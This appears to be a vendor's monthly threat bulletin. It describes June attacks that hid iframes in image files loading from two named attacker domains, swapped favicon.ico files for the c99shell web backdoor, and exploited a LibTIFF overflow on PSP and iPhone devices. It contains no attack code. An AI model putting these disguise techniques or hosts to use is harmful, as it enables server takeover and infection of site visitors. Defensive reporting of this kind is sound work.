Malicious image files were particularly prolific in June, three categories of these events are particularly noteworthy.

Malformed Image Files Launching Iframes
Beginning on June 2 and continuing throughout the month, ScanSafe's zero-day threat detection blocked large numbers of malicious image files (GIF, BMP, and JPG) containing iframes that attempted to load content from goldwindos2000.com and ciudad.com.ar. The malicious image files are predominantly hosted on legitimate websites presumed to have been compromised. In most cases, it appears the attackers have replaced actual site images with the malicious imposter images. The imposter images display normally but behind the scenes the iframe contained in the image attempts to launch malcode from the attacker site (as noted, these were either goldwindos2000.com and ciudad.com.ar in the instances STAT observed).

Interestingly, it appears that Roel Schouwenberg of Kaspersky Labs reported the iframe-loading image problem to Microsoft "quite a long time ago". Allegedly Microsoft declared the behavior a 'feature'. This is more than a little surprising, given the myriad of critical image handling vulnerabilities Windows users have had to grapple with over the years.

These malformed image files launching iframes coincide with a recently reported zero-day cross-frame vulnerability that could allow (among other things) keylogging via iframe manipulation.

Favicon.ico Hiding C99Shell
In gentler times, the favicon.ico is an image file that displays a custom icon for the visited website in the browser address bar. In these harsher times, multiple compromised sites (including several .edu) have unwittingly had their favicon.ico replaced with c99shell - malicious shell code that provides backdoor access and complete control of the Web server.

The shell code includes the following reference:

powered by Captain Crunch Security Team | http://ccteam.ru

iPod/iPhone/Sony PSP Exploit
Also seen in June, malicious TIFF files exploiting the LibTIFF TIFFFindFieldInfo remote buffer overflow first reported by PSP-Hacks in mid-June. The  LibTIFF TIFFFindFieldInfo remote buffer overflow impacts Sony PSP (Playstation Portable) running firmware versions 2.0 through 2.8, as well as v1.1.1 of Apple's iPhone and iPod touch.